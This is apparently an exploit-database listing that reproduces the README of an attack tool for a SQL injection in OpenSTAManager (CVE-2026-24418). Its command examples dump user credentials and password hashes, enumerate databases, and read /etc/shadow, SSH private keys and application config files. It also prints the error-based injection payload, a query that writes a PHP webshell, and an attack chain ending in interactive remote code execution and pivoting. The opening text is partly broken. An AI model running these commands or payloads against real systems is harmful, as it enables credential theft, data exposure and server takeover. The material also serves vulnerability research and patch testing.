Exploit for SQL Injection in Devcode Openstamanager CVE-2026-24418

Name: Exploit for SQL Injection in Devcode Openstamanager CVE-2026-24418
Rating: 5 (7 reviews)
2026-06-28 | CVSS 8.7
## https://sploitus.com/exploit?id=A7634540-503D-5B85-9921-973A2342C332
# CVE-2026-24418

**OpenSTAManager  --info
```

### Reconnaissance

```bash
# Database info + privileges + user credentials
python3 exploit.py -t http://target.com -u admin -p secret --all

# Check MySQL privileges (FILE, SUPER, etc.)
python3 exploit.py -t http://target.com -u admin -p secret --privs
```

### Credential Extraction

```bash
# Dump users and auto-export hashes
python3 exploit.py -t http://target.com -u admin -p secret --users -o ./loot

# Output files:
#   ./loot/users.json          - Full user data
#   ./loot/users.csv           - CSV format
#   ./loot/hashes_hashcat.txt  - Hashcat format (mode 3200)
#   ./loot/hashes_john.txt     - John format (user:hash)
```

### Database Enumeration

```bash
# List all databases
python3 exploit.py -t http://target.com -u admin -p secret --dbs

# List tables in a specific database
python3 exploit.py -t http://target.com -u admin -p secret --tables -D openstamanager

# List columns of a table
python3 exploit.py -t http://target.com -u admin -p secret --columns -T zz_users

# Dump specific columns with row limit
python3 exploit.py -t http://target.com -u admin -p secret --dump -T zz_users -C username,password --limit 10
```

### File Read (LFI via SQL)

```bash
# Read /etc/passwd
python3 exploit.py -t http://target.com -u admin -p secret --file-read /etc/passwd

# Read application config (database credentials)
python3 exploit.py -t http://target.com -u admin -p secret --file-read /var/www/html/openstamanager/config.inc.php

# Read SSH keys
python3 exploit.py -t http://target.com -u admin -p secret --file-read /home/user/.ssh/id_rsa

# HEX mode (bypass character filters)
python3 exploit.py -t http://target.com -u admin -p secret --file-read-hex /etc/shadow
```

### Remote Code Execution

```bash
# Upload webshell (auto-detects webroot)
python3 exploit.py -t http://target.com -u admin -p secret --webshell

# Upload webshell with specific webroot
python3 exploit.py -t http://target.com -u admin -p secret --webshell --webroot /var/www/html

# Interactive shell session
python3 exploit.py -t http://target.com -u admin -p secret --rce

# RCE will auto-upload webshell if none exists
```

### Output & Reporting

```bash
# Save everything to a directory
python3 exploit.py -t http://target.com -u admin -p secret --all -o ./loot

# Generated files:
#   db_info.json, privileges.json, users.json, users.csv,
#   hashes_hashcat.txt, hashes_john.txt
```

### Network Options

```bash
# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --users --proxy http://127.0.0.1:8080

# With request delay (2 seconds between requests)
python3 exploit.py -t http://target.com -u admin -p secret --users --delay 2

# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --info -k
```

## Full Option Reference

```
Target:
  -t, --target           Target base URL

Authentication:
  -u, --user             Username for login
  -p, --password         Password for login
  -c, --cookie           Existing PHPSESSID value

Enumeration:
  -D, --database         Target database name
  -T, --table            Target table name
  -C, --columns-list     Columns to dump (comma-separated)
  --limit                Row limit for dumps

Actions:
  --info                 Database server information
  --users                Dump zz_users credentials
  --dbs                  Enumerate databases
  --tables               List tables
  --columns              List columns (requires -T)
  --dump                 Dump data (requires -T and -C)
  --sql QUERY            Custom SQL query
  --all                  Run --info + --privs + --users
  --privs                Check MySQL privileges

File Operations:
  --file-read PATH       Read file via LOAD_FILE()
  --file-read-hex PATH   Read file via HEX encoding

Remote Code Execution:
  --webshell             Upload PHP webshell
  --webroot PATH         Webroot path for shell upload
  --rce                  Interactive command execution

Output:
  -o, --output DIR       Save results to directory

Network:
  -m, --module-id        Module ID (default: 18)
  --proxy                HTTP proxy URL
  -k, --no-ssl-verify    Disable SSL verification
  --delay                Request delay in seconds
```

## Technical Details

### Payload Structure

```
id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,()))#
```

### EXTRACTVALUE Character Limit

MySQL's `EXTRACTVALUE()` returns max ~32 characters via XPATH errors. The tool automatically chunks long results using `SUBSTRING()`:

```sql
SUBSTRING((), 1, 31)    -- Chunk 1
SUBSTRING((), 32, 31)   -- Chunk 2
...
```

### Webshell Upload Mechanism

> **Technical Note on Error-Based Context:** While `--webshell` and `--rce` are included for maximum coverage, MySQL strictly forbids using `INTO DUMPFILE` within a subquery or an `IN()` clause (which is exactly where this CVE's injection point is located). 
> 
> Therefore, writing files directly via this specific error-based injection will typically fail with a syntax error unless:
> 1. The target environment allows Stacked Queries (very rare in modern PHP/PDO setups).
> 2. You manage to pivot the payload into a UNION-based injection.
> 
> If you confirm `FILE` privileges via `--privs`, your best bet is using `--file-read` and `--file-read-hex`, as `LOAD_FILE()` works flawlessly inside error-based subqueries.

When FILE privilege is available and constraints allow:

```sql
SELECT 0x INTO DUMPFILE '/var/www/html/shell.php'
```

### Vulnerable Code Path

```
POST /actions.php?id_module=18
    └── actions.php (L503-506) ─── receives id_records[]
        └── array_clean() ─── only removes empty values
            └── bulk.php (L88) ─── builds SQL IN() clause
                └── Database.php (L289) ─── executes unsanitized query
                    └── XPATH error leaks data
```

## Attack Chain Example

```
1. --privs        → Check FILE privilege
2. --users        → Dump credentials, export hashes
3. --file-read    → Read config.inc.php for DB creds
4. --file-read    → Read /etc/passwd for usernames
5. --webshell     → Upload PHP webshell
6. --rce          → Interactive shell → pivot
```

## Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing. The author assumes no liability for misuse.

## References

- [CVE-2026-24418 (NVD)](https://nvd.nist.gov/vuln/detail/CVE-2026-24418)
- [GitHub Security Advisory — GHSA-4xwv-49c8-fvhq](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq)
- [OpenSTAManager Repository](https://github.com/devcode-it/openstamanager)
- [PoC by Lukasz Rybak](https://github.com/lukasz-rybak/CVE-2026-24418)